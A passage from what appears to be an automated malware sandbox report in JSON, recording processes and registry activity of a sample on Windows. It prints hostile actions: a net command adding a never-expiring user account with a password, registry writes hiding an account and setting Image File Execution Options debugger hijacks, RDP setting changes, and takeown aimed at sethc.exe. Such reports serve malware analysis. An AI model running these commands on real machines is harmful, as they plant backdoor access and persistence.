"C:\\Users\\cuck\\AppData\\Local\\Temp\\subinacl.exe",
"C:\\Windows\\System32\\reg.COM",
"C:\\Users\\cuck\\AppData\\Local\\Temp\\attrib",
"C:\\Windows\\System32\\wbem\\subinacl.exe.*",
"C:\\Users\\cuck\\AppData\\Local\\Temp\\takeown",
"C:\\Users\\cuck\\AppData\\Local\\Temp\\SH.bat",
"C:\\Windows\\System32\\wbem\\y.*",
"C:\\Users\\cuck",
"C:\\Python27\\Scripts\\subinacl.exe.*",
"C:\\Windows\\System32\\cacls.COM",
"C:\\Users\\cuck\\AppData\\Local\\Temp\\y.*",
"C:\\Python27\\Reg",
"C:\\Users\\cuck\\AppData\\Local",
"C:\\Python27\\y",
"C:\\Python27\\takeown.*",
"C:\\Windows\\System32\\takeown.COM",
"C:\\Windows\\System32\\attrib.exe",
"C:\\Python27\\Scripts\\attrib.*",
"C:\\Python27\\Scripts\\y.*",
"C:\\Python27\\Scripts\\subinacl.exe",
"C:\\Windows\\System32\\takeown.*",
"C:\\Python27\\Scripts\\Reg.*",
"C:\\Windows\\System32\\sethc.exe",
"C:\\Python27\\Scripts\\Reg",
"C:\\Python27\\Scripts\\y",
"C:\\Windows\\System32\\cacls.exe",
"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\subinacl.exe",
"C:\\Python27\\attrib.*",
"C:\\Python27\\subinacl.exe",
"C:\\Windows\\System32\\cacls.*",
"C:\\Windows\\subinacl.exe.*",
"C:\\Python27\\Scripts\\takeown",
"C:\\Windows\\System32\\reg.exe"
]
},
"first_seen": 1574704387.171751,
"ppid": 2740
},
{
"process_path": "C:\\Windows\\SysWOW64\\reg.exe",
"process_name": "reg.exe",
"pid": 4168,
"summary": {
"file_opened": [
"C:\\Windows\\SysWOW64\\en-US\\KERNELBASE.dll.mui",
"C:\\Windows\\Globalization\\Sorting\\sortdefault.nls"
],
"regkey_opened": [
"HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System",
"HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\services\\SharedAccess\\Epoch"
],
"regkey_read": [
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\GRE_Initialize\\DisableMetaFiles",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\SharedAccess\\Epoch\\Epoch",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\CustomLocale\\en-US",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\ExtendedLocale\\en-US"
],
"dll_loaded": [
"kernel32.dll"
],
"regkey_written": [
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\SharedAccess\\Epoch\\Epoch"
]
},
"first_seen": 1574704405.999876,
"ppid": 2588
},
{
"process_path": "C:\\Windows\\SysWOW64\\reg.exe",
"process_name": "reg.exe",
"pid": 4024,
"summary": {
"file_opened": [
"C:\\Windows\\SysWOW64\\en-US\\KERNELBASE.dll.mui",
"C:\\Windows\\Globalization\\Sorting\\sortdefault.nls"
],
"regkey_opened": [
"HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System",
"HKEY_LOCAL_MACHINE\\system\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp"
],
"regkey_read": [
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\GRE_Initialize\\DisableMetaFiles",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Terminal Server\\WinStations\\RDP-Tcp\\MaxConnectionTime",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\CustomLocale\\en-US",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\ExtendedLocale\\en-US"
],
"dll_loaded": [
"kernel32.dll"
],
"regkey_written": [
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Terminal Server\\WinStations\\RDP-Tcp\\MaxConnectionTime"
]
},
"first_seen": 1574704391.202999,
"ppid": 2588
},
{
"process_path": "C:\\Windows\\SysWOW64\\wbem\\WMIC.exe",
"process_name": "WMIC.exe",
"pid": 2804,
"summary": {
"dll_loaded": [
"urlmon.dll",
"wininet.dll",
"OLEAUT32.dll",
"C:\\Windows\\system32\\kernel32.dll",
"C:\\Windows\\system32\\wbem\\xml\\wmi2xml.dll",
"C:\\Windows\\system32\\uxtheme.dll"
],
"file_opened": [
"C:\\Windows\\System32\\wbem\\XSL-Mappings.xml",
"C:\\Windows\\System32\\wbem\\textvaluelist.xsl"
],
"regkey_opened": [
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Internet Explorer\\MAIN\\FeatureControl\\FEATURE_ALLOW_REVERSE_SOLIDUS_IN_USERINFO_KB932562",
"HKEY_LOCAL_MACHINE\\Software\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings",
"HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl",
"HKEY_CURRENT_USER\\Interface\\{423EC01E-2E35-11D2-B604-00104B703EFD}",
"HKEY_CURRENT_USER\\SOFTWARE\\Classes\\PROTOCOLS\\Filter\\text\/xml",
"HKEY_CURRENT_USER\\Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Wbem\\CIMOM",
"HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings",
"HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\crypt32",
"HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl\\FEATURE_HTTP_USERNAME_PASSWORD_DISABLE",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\Wow6432Node\\Interface\\{423EC01E-2E35-11D2-B604-00104B703EFD}\\ProxyStubClsid32",
"HKEY_LOCAL_MACHINE\\Software\\Microsoft\\WBEM\\TextSource\\1",
"HKEY_CLASSES_ROOT\\PROTOCOLS\\Name-Space Handler\\*\\",
"HKEY_CLASSES_ROOT\\.xml",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\Wow6432Node\\Interface\\{1C1C45EE-4395-11D2-B60B-00104B703EFD}\\ProxyStubClsid32",
"HKEY_CURRENT_USER\\Interface\\{1C1C45EE-4395-11D2-B60B-00104B703EFD}",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\CIMOM",
"HKEY_CLASSES_ROOT\\PROTOCOLS\\Name-Space Handler\\file\\",
"HKEY_CLASSES_ROOT\\PROTOCOLS\\Name-Space Handler\\",
"HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl\\FEATURE_MIME_HANDLING",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\PROTOCOLS\\Filter\\text\/xml",
"HKEY_CURRENT_USER\\Software\\Policies\\Microsoft\\Internet Explorer\\Main\\FeatureControl",
"HKEY_LOCAL_MACHINE\\Software\\Microsoft\\WBEM\\CIMOM",
"HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings",
"HKEY_LOCAL_MACHINE\\Software\\Policies\\Microsoft\\Internet Explorer\\Main\\FeatureControl",
"HKEY_CURRENT_USER\\Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl\\FEATURE_MIME_HANDLING",
"HKEY_CURRENT_USER\\Software\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings",
"HKEY_CURRENT_USER\\Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl\\FEATURE_HTTP_USERNAME_PASSWORD_DISABLE"
],
"file_exists": [
"C:\\Windows\\System32\\wbem\\XSL-Mappings.xml"
],
"wmi_query": [
"SELECT Name FROM Win32_Group WHERE SID = 'S-1-5-32-544'"
],
"guid": [
"{2933bf95-7b36-11d2-b20e-00c04f983e60}",
"{78103fb7-aed7-4066-8bcd-30bb27b02331}",
"{2933bf93-7b36-11d2-b20e-00c04f983e60}",
"{4590f812-1d3a-11d0-891f-00aa004b2e24}",
"{00000003-0000-0000-c000-000000000046}",
"{855a71d0-e5cd-46de-9707-17f2bd1ed694}",
"{4590f811-1d3a-11d0-891f-00aa004b2e24}",
"{44aca674-e8fc-11d0-a07c-00c04fb68820}",
"{bfbf883a-cad7-11d3-a11b-00105a1f515a}",
"{8d1c559d-84f0-4bb3-a7d5-56a7435a9ba6}",
"{f6d90f12-9c73-11d3-b32e-00c04f990bb4}",
"{674b6698-ee92-11d0-ad71-00c04fd8fdff}",
"{8bc3f05e-d86b-11d0-a075-00c04fb68820}",
"{2933bf94-7b36-11d2-b20e-00c04f983e60}",
"{7c857801-7381-11cf-884d-00aa004b2e24}",
"{d5f569d0-593b-101a-b569-08002b2dbf7a}",
"{f309ad18-d86a-11d0-a075-00c04fb68820}",
"{dc12a687-737f-11cf-884d-00aa004b2e24}"
],
"file_read": [
"C:\\Windows\\System32\\wbem\\XSL-Mappings.xml",
"C:\\Windows\\System32\\wbem\\textvaluelist.xsl"
],
"regkey_read": [
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Internet Explorer\\MAIN\\FeatureControl\\FEATURE_MIME_HANDLING\\WMIC.exe",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\EnablePunycode",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\Wow6432Node\\Interface\\{423EC01E-2E35-11D2-B604-00104B703EFD}\\ProxyStubClsid32\\(Default)",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\EnablePunycode",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\Wow6432Node\\Interface\\{1C1C45EE-4395-11D2-B60B-00104B703EFD}\\ProxyStubClsid32\\(Default)",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\crypt32\\DebugHeapFlags",
"HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\EnablePunycode",
"HKEY_CURRENT_USER\\Software\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\CreateUriCacheSize",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Internet Explorer\\MAIN\\FeatureControl\\FEATURE_HTTP_USERNAME_PASSWORD_DISABLE\\*",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\GRE_Initialize\\DisableMetaFiles",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\Tcpip\\Parameters\\Hostname",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\WBEM\\CIMOM\\EnableObjectValidation",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\WBEM\\TextSource\\1\\TextSourceDll",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\CreateUriCacheSize",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\WBEM\\CIMOM\\Log File Max Size",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\Tcpip\\Parameters\\Domain",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\DisableImprovedZoneCheck",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\WBEM\\CIMOM\\Logging Directory",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\WBEM\\CIMOM\\Logging",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Internet Explorer\\MAIN\\FeatureControl\\FEATURE_MIME_HANDLING\\*",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\.xml\\Content Type",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\CreateUriCacheSize",
"HKEY_CURRENT_USER\\Software\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\EnablePunycode",
"HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\IsTextPlainHonored",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Internet Explorer\\MAIN\\FeatureControl\\FEATURE_HTTP_USERNAME_PASSWORD_DISABLE\\WMIC.exe",
"HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\CreateUriCacheSize",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Security_HKLM_only"
],
"directory_enumerated": [
"C:\\Windows\\System32\\wbem\\XSL-Mappings.xml"
]
},
"first_seen": 1574704386.484375,
"ppid": 2244
},
{
"process_path": "C:\\Windows\\SysWOW64\\net1.exe",
"process_name": "net1.exe",
"pid": 3516,
"summary": {
"dll_loaded": [
"rpcrt4.dll",
"NETMSG",
"SAMLIB.dll",
"RPCRT4.dll"
],
"file_opened": [
"\\\\?\\PIPE\\lsarpc",
"\\\\?\\PIPE\\samr"
],
"regkey_opened": [
"HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Rpc",
"HKEY_LOCAL_MACHINE\\Software\\Policies\\Microsoft\\Windows NT\\Rpc"
],
"file_written": [
"\\\\?\\PIPE\\lsarpc",
"\\\\?\\PIPE\\samr"
],
"file_read": [
"\\\\?\\PIPE\\lsarpc",
"\\\\?\\PIPE\\samr"
],
"regkey_read": [
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\Language\\InstallLanguageFallback",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\CustomLocale\\en-US",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\Locale\\00000409",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Rpc\\MaxRpcSize",
"HKEY_LOCAL_MACHINE\\SYSTEM\\Setup\\SystemSetupInProgress",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\Language Groups\\1",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SQMClient\\Windows\\CEIPEnable",
"HKEY_CURRENT_USER\\Control Panel\\Desktop\\PreferredUILanguages",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\MUI\\UILanguages\\en-US\\Type",
"HKEY_LOCAL_MACHINE\\SYSTEM\\Setup\\OOBEInProgress",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\Windows Error Reporting\\WMR\\Disable",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\MUI\\UILanguages\\en-US\\AlternateCodePage",
"HKEY_CURRENT_USER\\Control Panel\\Desktop\\MuiCached\\MachinePreferredUILanguages",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\CustomLocale\\EMPTY",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\ComputerName\\ActiveComputerName\\ComputerName",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\ExtendedLocale\\en-US"
]
},
"first_seen": 1574704393.406124,
"ppid": 3460
},
{
"process_path": "C:\\Windows\\SysWOW64\\reg.exe",
"process_name": "reg.exe",
"pid": 3612,
"summary": {
"file_opened": [
"C:\\Windows\\SysWOW64\\en-US\\KERNELBASE.dll.mui",
"C:\\Windows\\Globalization\\Sorting\\sortdefault.nls"
],
"regkey_opened": [
"HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\SpecialAccounts\\UserList"
],
"regkey_read": [
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\Windows Error Reporting\\WMR\\Disable",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\SpecialAccounts\\UserList\\helpassistant",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\GRE_Initialize\\DisableMetaFiles",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\CustomLocale\\en-US",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\ExtendedLocale\\en-US"
],
"dll_loaded": [
"kernel32.dll"
],
"regkey_written": [
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\SpecialAccounts\\UserList\\helpassistant"
]
},
"first_seen": 1574704393.624876,
"ppid": 2588
},
{
"process_path": "C:\\Windows\\SysWOW64\\reg.exe",
"process_name": "reg.exe",
"pid": 3528,
"summary": {
"file_opened": [
"C:\\Windows\\SysWOW64\\en-US\\KERNELBASE.dll.mui",
"C:\\Windows\\Globalization\\Sorting\\sortdefault.nls"
],
"regkey_opened": [
"HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\Windows10Upgrade.exe"
],
"regkey_read": [
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\Windows Error Reporting\\WMR\\Disable",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\GRE_Initialize\\DisableMetaFiles",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\Windows10Upgrade.exe\\debugger",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\CustomLocale\\en-US",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\ExtendedLocale\\en-US"
],
"dll_loaded": [
"kernel32.dll"
],
"regkey_written": [
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\Windows10Upgrade.exe\\debugger"
]
},
"first_seen": 1574704389.577999,
"ppid": 2988
},
{
"process_path": "C:\\Windows\\SysWOW64\\reg.exe",
"process_name": "reg.exe",
"pid": 1484,
"summary": {
"file_opened": [
"C:\\Windows\\SysWOW64\\en-US\\KERNELBASE.dll.mui",
"C:\\Windows\\Globalization\\Sorting\\sortdefault.nls"
],
"regkey_opened": [
"HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Group Policy\\History\\{35378EAC-683F-11D2-A89A-00C04FBBCFA2}\\0"
],
"regkey_read": [
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\Windows Error Reporting\\WMR\\Disable",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\GRE_Initialize\\DisableMetaFiles",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Group Policy\\History\\{35378EAC-683F-11D2-A89A-00C04FBBCFA2}\\0\\Version",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\CustomLocale\\en-US",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\ExtendedLocale\\en-US"
],
"dll_loaded": [
"kernel32.dll"
],
"regkey_written": [
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Group Policy\\History\\{35378EAC-683F-11D2-A89A-00C04FBBCFA2}\\0\\Version"
]
},
"first_seen": 1574704404.468626,
"ppid": 2588
},
{
"process_path": "C:\\Windows\\SysWOW64\\net1.exe",
"process_name": "net1.exe",
"pid": 3540,
"summary": {
"regkey_read": [
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\Language\\InstallLanguageFallback",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\CustomLocale\\en-US",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\Locale\\00000409",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\Language Groups\\1",
"HKEY_CURRENT_USER\\Control Panel\\Desktop\\PreferredUILanguages",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\MUI\\UILanguages\\en-US\\Type",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\Windows Error Reporting\\WMR\\Disable",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\MUI\\UILanguages\\en-US\\AlternateCodePage",
"HKEY_CURRENT_USER\\Control Panel\\Desktop\\MuiCached\\MachinePreferredUILanguages",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\CustomLocale\\EMPTY",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\ExtendedLocale\\en-US"
],
"dll_loaded": [
"API-MS-WIN-Service-Management-L1-1-0.dll",
"NETMSG",
"API-MS-WIN-Service-winsvc-L1-1-0.dll"
]
},
"first_seen": 1574704397.546751,
"ppid": 3448
},
{
"process_path": "C:\\Windows\\SysWOW64\\net.exe",
"process_name": "net.exe",
"pid": 3036,
"summary": {
"command_line": [
"C:\\Windows\\system32\\net1 user ontar Preaba1! \/add \/active:\"yes\" \/expires:\"never\" \/passwordchg:\"NO\""
],
"regkey_read": [
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\Language\\InstallLanguageFallback",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\CustomLocale\\en-US",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\Locale\\00000409",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\Language Groups\\1",
"HKEY_CURRENT_USER\\Control Panel\\Desktop\\PreferredUILanguages",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\MUI\\UILanguages\\en-US\\Type",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\MUI\\UILanguages\\en-US\\AlternateCodePage",
"HKEY_CURRENT_USER\\Control Panel\\Desktop\\MuiCached\\MachinePreferredUILanguages",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\CustomLocale\\EMPTY",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\ExtendedLocale\\en-US"
]
},
"first_seen": 1574704386.843626,
"ppid": 2588
},
{
"process_path": "C:\\Windows\\SysWOW64\\takeown.exe",
"process_name": "takeown.exe",
"pid": 3240,
"summary": {
"file_opened": [
"C:\\Windows\\SysWOW64\\sethc.exe",
"C:\\",
"C:\\Windows\\Globalization\\Sorting\\sortdefault.nls"
],
"regkey_opened": [
"HKEY_LOCAL_MACHINE\\System\\CurrentControlSet\\Services\\LDAP",
"HKEY_LOCAL_MACHINE\\System\\CurrentControlSet\\Control\\LSA\\AccessProviders"
],
"regkey_read": [
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\CustomLocale\\en-US",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\LDAP\\UseOldHostResolutionOrder",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\GRE_Initialize\\DisableMetaFiles",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\ExtendedLocale\\en-US",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Lsa\\AccessProviders\\MartaExtension",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\LDAP\\UseHostnameAsAlias",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\LDAP\\LdapClientIntegrity"
],
"dll_loaded": [
"kernel32.dll",
"ntmarta.dll"
],
"file_failed": [
"C:\\Windows\\SysWOW64\\sethc.exe"
]
},
"first_seen": 1574704388.937374,
"ppid": 2988
},
{
"process_path": "C:\\Windows\\SysWOW64\\reg.exe",
"process_name": "reg.exe",
"pid": 3572,
"summary": {
"file_opened": [
"C:\\Windows\\SysWOW64\\en-US\\KERNELBASE.dll.mui",
"C:\\Windows\\Globalization\\Sorting\\sortdefault.nls"
],
"regkey_opened": [
"HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\EOSNotify.exe"
],
"regkey_read": [
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\Windows Error Reporting\\WMR\\Disable",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\GRE_Initialize\\DisableMetaFiles",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\EOSNotify.exe\\debugger",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\CustomLocale\\en-US",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\ExtendedLocale\\en-US"
],
"dll_loaded": [
"kernel32.dll"
],
"regkey_written": [
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\EOSNotify.exe\\debugger"
]
},
"first_seen": 1574704389.749876,
"ppid": 2988
},
{
"process_path": "C:\\Windows\\SysWOW64\\reg.exe",
"process_name": "reg.exe",
"pid": 4088,
"summary": {
"file_opened": [
"C:\\Windows\\SysWOW64\\en-US\\KERNELBASE.dll.mui",
"C:\\Windows\\Globalization\\Sorting\\sortdefault.nls"
],
"regkey_opened": [
"HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System",
"HKEY_LOCAL_MACHINE\\system\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp"
],
"regkey_read": [
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Terminal Server\\WinStations\\RDP-Tcp\\MaxDisconnectionTime",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\GRE_Initialize\\DisableMetaFiles",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\CustomLocale\\en-US",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\ExtendedLocale\\en-US"
],
"dll_loaded": [
"kernel32.dll"
],
"regkey_written": [
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Terminal Server\\WinStations\\RDP-Tcp\\MaxDisconnectionTime"
]
},
"first_seen": 1574704391.390499,
"ppid": 2588
}
]Signatures
[
{
"markcount": 14,
"families": [],
"description": "Queries for the computername",
"severity": 1,
"marks": [
{
"call": {
"category": "misc",
"status": 1,
"stacktrace": [],
"api": "GetComputerNameW",
"return_value": 1,
"arguments": {
"computer_name": "CUCKPC"
},
"time": 1574704386.624375,
"tid": 1224,
"flags": {}
},
"pid": 2804,
"type": "call",
"cid": 12
},
{
"call": {
"category": "misc",
"status": 1,
"stacktrace": [],
"api": "GetComputerNameW",
"return_value": 1,
"arguments": {
"computer_name": "CUCKPC"
},
"time": 1574704386.640375,
"tid": 1224,
"flags": {}
},
"pid": 2804,
"type": "call",
"cid": 174
},
{
"call": {
"category": "misc",
"status": 1,
"stacktrace": [],
"api": "GetComputerNameW",
"return_value": 1,
"arguments": {
"computer_name": "CUCKPC"
},
"time": 1574704386.655375,
"tid": 1224,
"flags": {}
},
"pid": 2804,
"type": "call",
"cid": 194
},
{
"call": {
"category": "misc",
"status": 1,
"stacktrace": [],
"api": "GetComputerNameW",
"return_value": 1,
"arguments": {
"computer_name": "CUCKPC"
},
"time": 1574704386.655375,
"tid": 1224,
"flags": {}
},
"pid": 2804,
"type": "call",
"cid": 234
},
{
"call": {
"category": "misc",
"status": 1,
"stacktrace": [],
"api": "GetComputerNameW",
"return_value": 1,
"arguments": {
"computer_name": "CUCKPC"
},
"time": 1574704386.655375,
"tid": 1224,
"flags": {}
},
"pid": 2804,
"type": "call",
"cid": 236
},
{
"call": {
"category": "misc",
"status": 1,
"stacktrace": [],
"api": "GetComputerNameW",
"return_value": 1,
"arguments": {
"computer_name": "CUCKPC"
},
"time": 1574704387.155999,
"tid": 2580,
"flags": {}
},
"pid": 528,
"type": "call",
"cid": 80
},
{
"call": {
"category": "misc",
"status": 1,
